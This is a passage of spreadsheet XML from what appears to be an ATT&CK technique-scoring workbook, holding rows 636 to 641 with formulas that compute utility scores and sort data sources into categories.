        <f t="array" ref="AG636">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD636)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH636" s="37">
        <v>632</v>
      </c>
      <c r="AI636" s="37" t="str" cm="1">
        <f t="array" ref="AI636">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD636)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ636" s="37">
        <v>632</v>
      </c>
      <c r="AK636" s="37" t="str" cm="1">
        <f t="array" ref="AK636">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD636)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL636" s="37">
        <v>632</v>
      </c>
      <c r="AM636" s="37" t="str" cm="1">
        <f t="array" ref="AM636">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD636)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN636" s="37"/>
      <c r="AO636" s="37">
        <v>0</v>
      </c>
      <c r="AP636" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ636" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.3</v>
      </c>
      <c r="AR636" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS636" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT636" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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37" spans="1:47" ht="17">
      <c r="A637" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B637" s="37">
        <f t="shared" si="9"/>
        <v>253.3</v>
      </c>
      <c r="C637" s="37" t="s">
        <v>3834</v>
      </c>
      <c r="D637" s="50" t="s">
        <v>3835</v>
      </c>
      <c r="E637" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F637" s="37">
        <v>1</v>
      </c>
      <c r="G637" s="37">
        <v>1</v>
      </c>
      <c r="H637" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I637" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J637" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K637" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L637" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M637" s="37">
        <v>0</v>
      </c>
      <c r="N637" s="56">
        <v>0</v>
      </c>
      <c r="O637" s="56">
        <v>0</v>
      </c>
      <c r="P637" s="56">
        <v>0</v>
      </c>
      <c r="Q637" s="56">
        <v>0</v>
      </c>
      <c r="R637" s="57"/>
      <c r="S637" s="57">
        <v>0</v>
      </c>
      <c r="T637" s="57"/>
      <c r="U637" s="57">
        <v>0</v>
      </c>
      <c r="V637" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W637" s="37"/>
      <c r="X637" s="37"/>
      <c r="Y637" s="37"/>
      <c r="Z637" s="37"/>
      <c r="AA637" s="37"/>
      <c r="AB637" s="37"/>
      <c r="AC637" s="37"/>
      <c r="AD637" s="50" t="s">
        <v>3783</v>
      </c>
      <c r="AE637" s="37" t="str" cm="1">
        <f t="array" ref="AE637">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD637)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF637" s="37">
        <v>633</v>
      </c>
      <c r="AG637" s="37" t="str" cm="1">
        <f t="array" ref="AG637">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD637)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH637" s="37">
        <v>633</v>
      </c>
      <c r="AI637" s="37" t="str" cm="1">
        <f t="array" ref="AI637">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD637)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ637" s="37">
        <v>633</v>
      </c>
      <c r="AK637" s="37" t="str" cm="1">
        <f t="array" ref="AK637">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD637)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL637" s="37">
        <v>633</v>
      </c>
      <c r="AM637" s="37" t="str" cm="1">
        <f t="array" ref="AM637">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD637)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN637" s="37"/>
      <c r="AO637" s="37">
        <v>0</v>
      </c>
      <c r="AP637" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ637" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.433333333333337</v>
      </c>
      <c r="AR637" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS637" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT637" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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38" spans="1:47" ht="34">
      <c r="A638" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B638" s="37">
        <f t="shared" si="9"/>
        <v>253.70000000000002</v>
      </c>
      <c r="C638" s="37" t="s">
        <v>3836</v>
      </c>
      <c r="D638" s="50" t="s">
        <v>3837</v>
      </c>
      <c r="E638" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F638" s="37">
        <v>1</v>
      </c>
      <c r="G638" s="37">
        <v>1</v>
      </c>
      <c r="H638" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I638" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J638" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K638" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L638" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M638" s="37">
        <v>0</v>
      </c>
      <c r="N638" s="56">
        <v>0</v>
      </c>
      <c r="O638" s="56">
        <v>0</v>
      </c>
      <c r="P638" s="56">
        <v>0</v>
      </c>
      <c r="Q638" s="56">
        <v>0</v>
      </c>
      <c r="R638" s="57"/>
      <c r="S638" s="57">
        <v>0</v>
      </c>
      <c r="T638" s="57"/>
      <c r="U638" s="57">
        <v>0</v>
      </c>
      <c r="V638" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W638" s="37"/>
      <c r="X638" s="37"/>
      <c r="Y638" s="37"/>
      <c r="Z638" s="37"/>
      <c r="AA638" s="37"/>
      <c r="AB638" s="37"/>
      <c r="AC638" s="37"/>
      <c r="AD638" s="50" t="s">
        <v>3838</v>
      </c>
      <c r="AE638" s="37" t="str" cm="1">
        <f t="array" ref="AE638">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD638)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF638" s="37">
        <v>634</v>
      </c>
      <c r="AG638" s="37" t="str" cm="1">
        <f t="array" ref="AG638">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD638)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH638" s="37">
        <v>634</v>
      </c>
      <c r="AI638" s="37" t="str" cm="1">
        <f t="array" ref="AI638">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD638)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ638" s="37">
        <v>634</v>
      </c>
      <c r="AK638" s="37" t="str" cm="1">
        <f t="array" ref="AK638">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD638)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL638" s="37">
        <v>634</v>
      </c>
      <c r="AM638" s="37" t="str" cm="1">
        <f t="array" ref="AM638">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD638)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN638" s="37"/>
      <c r="AO638" s="37">
        <v>0</v>
      </c>
      <c r="AP638" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ638" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.566666666666677</v>
      </c>
      <c r="AR638" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS638" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT638" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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39" spans="1:47" ht="17">
      <c r="A639" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B639" s="37">
        <f t="shared" si="9"/>
        <v>254.10000000000002</v>
      </c>
      <c r="C639" s="37" t="s">
        <v>3839</v>
      </c>
      <c r="D639" s="50" t="s">
        <v>3840</v>
      </c>
      <c r="E639" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F639" s="37">
        <v>1</v>
      </c>
      <c r="G639" s="37">
        <v>1</v>
      </c>
      <c r="H639" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I639" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J639" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K639" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L639" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M639" s="37">
        <v>0</v>
      </c>
      <c r="N639" s="56">
        <v>0</v>
      </c>
      <c r="O639" s="56">
        <v>0</v>
      </c>
      <c r="P639" s="56">
        <v>0</v>
      </c>
      <c r="Q639" s="56">
        <v>0</v>
      </c>
      <c r="R639" s="57"/>
      <c r="S639" s="57">
        <v>0</v>
      </c>
      <c r="T639" s="57"/>
      <c r="U639" s="57">
        <v>0</v>
      </c>
      <c r="V639" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W639" s="37"/>
      <c r="X639" s="37"/>
      <c r="Y639" s="37"/>
      <c r="Z639" s="37"/>
      <c r="AA639" s="37"/>
      <c r="AB639" s="37"/>
      <c r="AC639" s="37"/>
      <c r="AD639" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE639" s="37" t="str" cm="1">
        <f t="array" ref="AE639">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD639)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF639" s="37">
        <v>635</v>
      </c>
      <c r="AG639" s="37" t="str" cm="1">
        <f t="array" ref="AG639">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD639)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH639" s="37">
        <v>635</v>
      </c>
      <c r="AI639" s="37" t="str" cm="1">
        <f t="array" ref="AI639">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD639)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ639" s="37">
        <v>635</v>
      </c>
      <c r="AK639" s="37" t="str" cm="1">
        <f t="array" ref="AK639">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD639)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL639" s="37">
        <v>635</v>
      </c>
      <c r="AM639" s="37" t="str" cm="1">
        <f t="array" ref="AM639">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD639)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN639" s="37"/>
      <c r="AO639" s="37">
        <v>0</v>
      </c>
      <c r="AP639" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ639" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.7</v>
      </c>
      <c r="AR639" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS639" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT639" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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40" spans="1:47" ht="17">
      <c r="A640" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B640" s="37">
        <f t="shared" si="9"/>
        <v>254.5</v>
      </c>
      <c r="C640" s="37" t="s">
        <v>3841</v>
      </c>
      <c r="D640" s="50" t="s">
        <v>3842</v>
      </c>
      <c r="E640" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F640" s="37">
        <v>1</v>
      </c>
      <c r="G640" s="37">
        <v>1</v>
      </c>
      <c r="H640" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I640" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J640" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K640" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L640" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M640" s="37">
        <v>0</v>
      </c>
      <c r="N640" s="56">
        <v>0</v>
      </c>
      <c r="O640" s="56">
        <v>0</v>
      </c>
      <c r="P640" s="56">
        <v>0</v>
      </c>
      <c r="Q640" s="56">
        <v>0</v>
      </c>
      <c r="R640" s="57"/>
      <c r="S640" s="57">
        <v>0</v>
      </c>
      <c r="T640" s="57"/>
      <c r="U640" s="57">
        <v>0</v>
      </c>
      <c r="V640" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W640" s="37"/>
      <c r="X640" s="37"/>
      <c r="Y640" s="37"/>
      <c r="Z640" s="37"/>
      <c r="AA640" s="37"/>
      <c r="AB640" s="37"/>
      <c r="AC640" s="37"/>
      <c r="AD640" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE640" s="37" t="str" cm="1">
        <f t="array" ref="AE640">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD640)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF640" s="37">
        <v>636</v>
      </c>
      <c r="AG640" s="37" t="str" cm="1">
        <f t="array" ref="AG640">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD640)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH640" s="37">
        <v>636</v>
      </c>
      <c r="AI640" s="37" t="str" cm="1">
        <f t="array" ref="AI640">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD640)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ640" s="37">
        <v>636</v>
      </c>
      <c r="AK640" s="37" t="str" cm="1">
        <f t="array" ref="AK640">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD640)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL640" s="37">
        <v>636</v>
      </c>
      <c r="AM640" s="37" t="str" cm="1">
        <f t="array" ref="AM640">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD640)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN640" s="37"/>
      <c r="AO640" s="37">
        <v>0</v>
      </c>
      <c r="AP640" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ640" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.833333333333329</v>
      </c>
      <c r="AR640" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS640" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT640" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU64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41" spans="1:47" ht="34">
      <c r="A641" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B641" s="37">
        <f t="shared" si="9"/>
        <v>254.9</v>
      </c>
      <c r="C641" s="37" t="s">
        <v>3843</v>
      </c>
      <c r="D641" s="50" t="s">
        <v>3844</v>
      </c>
      <c r="E641" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F641" s="37">
        <v>1</v>
      </c>
      <c r="G641" s="37">
        <v>1</v>
      </c>
      <c r="H641" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I641" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J641" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K641" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L641" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M641" s="37">
        <v>0</v>
      </c>
      <c r="N641" s="56">
        <v>0</v>
      </c>
      <c r="O641" s="56">
        <v>0</v>
      </c>
      <c r="P641" s="56">
        <v>0</v>
      </c>
      <c r="Q641" s="56">
        <v>0</v>
      </c>
      <c r="R641" s="57"/>
      <c r="S641" s="57">
        <v>0</v>
      </c>
      <c r="T641" s="57"/>
      <c r="U641" s="57">
        <v>0</v>
      </c>
      <c r="V641" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W641" s="37"/>
      <c r="X641" s="37"/>
      <c r="Y641" s="37"/>
      <c r="Z641" s="37"/>
      <c r="AA641" s="37"/>
      <c r="AB641" s="37"/>
      <c r="AC641" s="37"/>
      <c r="AD641" s="50" t="s">
        <v>3845</v>
      </c>
      <c r="AE641" s="37" t="str" cm="1">
        <f t="array" ref="AE641">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD641)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF641" s="37">
        <v>637</v>
      </c>
      <c r="AG641" s="37" t="str" cm="1">
        <f t="array" ref="AG641">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD641)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH641" s="37">
        <v>637</v>
      </c>
      <c r="AI641" s="37" t="str" cm="1">
        <f t="array" ref="AI641">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD641)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ641" s="37">
        <v>637</v>
      </c>
      <c r="AK641" s="37" t="str" cm="1">
        <f t="array" ref="AK641">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD641)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL641" s="37">
        <v>637</v>
      </c>
      <c r="AM641" s="37" t="str" cm="1">
        <f t="array" ref="AM641">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD641)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN641" s="37"/>
      <c r="AO641" s="37">
        <v>0</v>
      </c>
      <c r="AP641" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ641" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.966666666666669</v>
      </c>
      <c r="AR641" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS641" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT641" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU64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sheetData>
  <mergeCells count="6">
    <mergeCell ref="AO1:AU1"/>
    <mergeCell ref="F1:L1"/>
    <mergeCell ref="N2:Q2"/>
    <mergeCell ref="R2:U2"/>
    <mergeCell ref="N1:V1"/>
    <mergeCell ref="AD1:AM1"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
